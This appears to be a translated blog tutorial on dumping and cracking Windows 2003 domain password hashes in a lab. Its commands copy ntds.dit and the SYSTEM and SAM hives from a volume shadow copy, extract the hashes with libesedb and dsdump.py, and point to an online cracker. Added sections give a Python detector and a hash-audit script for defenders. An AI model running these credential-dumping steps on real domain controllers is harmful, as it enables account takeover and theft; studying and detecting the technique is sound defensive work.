Offline cracking of a Windows 2003 domain account password
Many methods have been written up on Chinese websites; here I share the steps that worked in my own experiment.
The procedure follows Tim's article, linked here:
http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
1. Experimental environment: Windows Server 2003, domain environment
Setting it up is very simple; a Baidu search will turn up instructions.
Tools needed: vssown.vbs, BT5, ntds_dump_hash.zip
vssown.vbs: search for it online
http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z
Create a new domain user xiaocai with the password set to 123abcabc.
2. Extract the files on Win2003
1) Copy vssown.vbs to the domain controller, for example onto its desktop.
2) Run cmd as Administrator and execute the following commands:
cd Desktop
cscript //nologo vssown.vbs /start      (enable the Volume Shadow Copy service)
cscript //nologo vssown.vbs /status     (check that it is running)
cscript //nologo vssown.vbs /create C   (create a snapshot of drive C:)
cscript //nologo vssown.vbs /list       (list the snapshots that were created)
The listing shows the snapshot's device path. Copy ntds.dit and the SYSTEM and SAM registry hives from the snapshot to the desktop, replacing [X] with the snapshot number; here it is 5.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM
That completes the extraction of the files. Attempts at this step often fail; I have not had time to look into the cause.
Delete the snapshot (this step is optional, but recommended):
cscript //nologo vssown.vbs /delete {b3475a72-86d2-48ec-a22f-6e8dbb82903d}
Copy the three extracted files off the server.
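The sequence above (start the VSS service, create a snapshot, then read ntds.dit and the SYSTEM/SAM hives through the GLOBALROOT shadow-copy device path) is exactly the pattern a defender should alert on when it appears in process-creation logs from a domain controller. The following detector is an added example written for this page, not code from the original post or from the tools it names; it assumes a constructed, simplified log format (`timestamp host=... user=... cmd=...`) and constructed sample lines, so the field names and the regular expressions are assumptions, not a real product's log schema.

```python
import re

# Constructed sample process-creation log lines (not from the original page).
# Assumed format: "<timestamp> host=<name> user=<name> cmd=<command line>"
SAMPLE_LOG = """\
2024-01-01T10:00:01 host=DC01 user=DOMAIN\\admin cmd=cscript //nologo vssown.vbs /start
2024-01-01T10:00:05 host=DC01 user=DOMAIN\\admin cmd=cscript //nologo vssown.vbs /create C
2024-01-01T10:00:20 host=DC01 user=DOMAIN\\admin cmd=copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy5\\windows\\ntds\\ntds.dit C:\\Users\\admin\\Desktop\\ntds.dit
2024-01-01T10:00:25 host=DC01 user=DOMAIN\\admin cmd=copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy5\\windows\\system32\\config\\SYSTEM C:\\Users\\admin\\Desktop\\SYSTEM
2024-01-01T11:30:00 host=FS01 user=DOMAIN\\backup cmd=vssadmin list shadows
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

# Snapshot creation: the vssown.vbs /create used on this page, plus the built-in
# vssadmin and wmic equivalents (assumed common variants, listed here for coverage).
SHADOW_CREATE = re.compile(
    r"(vssown\.vbs\s+/create|vssadmin\s+create\s+shadow|wmic\s+shadowcopy\s+call\s+create)", re.I)

# A read of the AD database or the registry hives through a shadow-copy device path.
SHADOW_READ_SENSITIVE = re.compile(
    r"HarddiskVolumeShadowCopy\d+\\.*?(ntds\.dit|config\\(system|sam)\b)", re.I)


def parse_line(line):
    """Split one log line into its fields; return None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(cmd):
    """Return the list of detection tags that apply to a single command line."""
    tags = []
    if SHADOW_CREATE.search(cmd):
        tags.append("shadow_copy_created")
    if SHADOW_READ_SENSITIVE.search(cmd):
        tags.append("ad_database_read_from_shadow")
    return tags


def detect(log_text):
    """Scan a whole log and return one event dict per (line, tag) match, in log order."""
    events = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        for tag in classify(rec["cmd"]):
            events.append({**rec, "tag": tag})
    return events


def correlate(events):
    """Raise severity when a sensitive read follows a snapshot creation on the same host.

    A shadow copy by itself is routine (backups do it); reading ntds.dit or the
    SYSTEM/SAM hives out of one is not, and the combination is the strong signal.
    """
    hosts_with_snapshot = set()
    alerts = []
    for ev in events:
        if ev["tag"] == "shadow_copy_created":
            hosts_with_snapshot.add(ev["host"])
        elif ev["tag"] == "ad_database_read_from_shadow":
            severity = "high" if ev["host"] in hosts_with_snapshot else "medium"
            alerts.append({"host": ev["host"], "user": ev["user"], "ts": ev["ts"],
                           "severity": severity, "cmd": ev["cmd"]})
    return alerts


if __name__ == "__main__":
    for a in correlate(detect(SAMPLE_LOG)):
        print("%s %-6s %s %s: %s" % (a["ts"], a["severity"], a["host"], a["user"], a["cmd"]))
```

On the constructed sample this yields two high-severity alerts for DC01 (the ntds.dit and SYSTEM copies after the snapshot) and nothing for the file server that merely listed its shadows. In a real deployment the same two rules would sit on Sysmon event 1 or Windows 4688 command lines; the mitigation side is the one the page itself hints at: shadow copies on a domain controller should be created by backup software, not by an administrator's script on the desktop.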
3. Extract the hashes
First download the tools. For BT5 I used this virtual machine image:
VMware image, 32-bit: http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z
Default login: root / toor
Start the SSH service (once it is running you can connect with SecureCRT, which makes file transfer convenient):
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
sshd-generate
/etc/init.d/ssh restart
(This is a slight digression.)
Find the IP address with ifconfig,
then connect with SecureCRT.
Press Alt+P to open SFTP and upload the files to /tmp:
cd /tmp
put SYSTEM ntds.dit ntds_dump_hash.zip
Switch to the BT5 system tab:
cd /tmp
ls
# unzip ntds_dump_hash.zip
unzip ntds_dump_hash.zip
# compile libesedb
cd libesedb
chmod +x configure
./configure && make
# parse the ntds.dit data file (output goes to ntds.dit.export/)
cd esedbtools
./esedbdumphash ../../ntds.dit
# extract the hashes (the hive uploaded above is named SYSTEM; the name is case-sensitive on Linux)
cd ../../creddump/
python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable
After extraction, the result is:
xiaocai:1109:8a79528ccd6e0dbffcd6b8db0f458c37:3b0de00581a39a49946206e0998b7df7:::
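The line above is in pwdump format: user name, RID, LM hash, NT hash, and three empty trailing fields. Two well-known constants make such output readable at a glance: the LM field is `aad3b435b51404eeaad3b435b51404ee` when no LM hash is stored, and the NT field is `31d6cfe0d16ae931b73c59d7e0c089c0` for an empty password. The xiaocai record has a real LM hash, which tells a defender that this domain controller still stores LM hashes (the "Do not store LAN Manager hash value on next password change" policy is not in effect), a far weaker position than NT-only storage. The following parser and audit check is an added example written for this page, not code from the original post or from the ntdsxtract/creddump tools; the second sample account and the finding names are constructed.

```python
import re

# Well-known constants (not from the page): the LM field emitted when no LM hash is
# stored, and the NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Sample dump: the record from the page plus one constructed account (not real data).
SAMPLE_DUMP = """\
xiaocai:1109:8a79528ccd6e0dbffcd6b8db0f458c37:3b0de00581a39a49946206e0998b7df7:::
svc_test:1120:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump_line(line):
    """Parse one pwdump-format record: user:RID:LM-hash:NT-hash:::"""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("not a pwdump record: %r" % line)
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    if not (HEX32.match(lm) and HEX32.match(nt)):
        raise ValueError("hash fields must be 32 hex characters: %r" % line)
    return {"user": user, "rid": rid, "lm": lm, "nt": nt}


def audit_dump(text):
    """Return one finding per account that stores an LM hash or has an empty password.

    Each finding is {"user", "rid", "issues"}; accounts with neither issue are omitted.
    """
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_pwdump_line(line)
        issues = []
        if rec["lm"] != EMPTY_LM:
            issues.append("lm_hash_stored")
        if rec["nt"] == EMPTY_NT:
            issues.append("empty_password")
        if issues:
            findings.append({"user": rec["user"], "rid": rec["rid"], "issues": issues})
    return findings


if __name__ == "__main__":
    for f in audit_dump(SAMPLE_DUMP):
        print("%-12s RID %-5d %s" % (f["user"], f["rid"], ", ".join(f["issues"])))
```

Run against the sample it reports xiaocai for LM-hash storage and the constructed svc_test account for an empty password. The same check run over a full dump is the quickest way to see how much of a domain is still exposed to LM-era weaknesses after the NoLMHash policy is enabled, since existing hashes are only replaced when each user next changes their password.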
4. Crack the hash
There are many ways to crack the hash; here I use a website. Paste the bold part of the line above into the site: http://www.objectif-securite.ch/en/ophcrack.php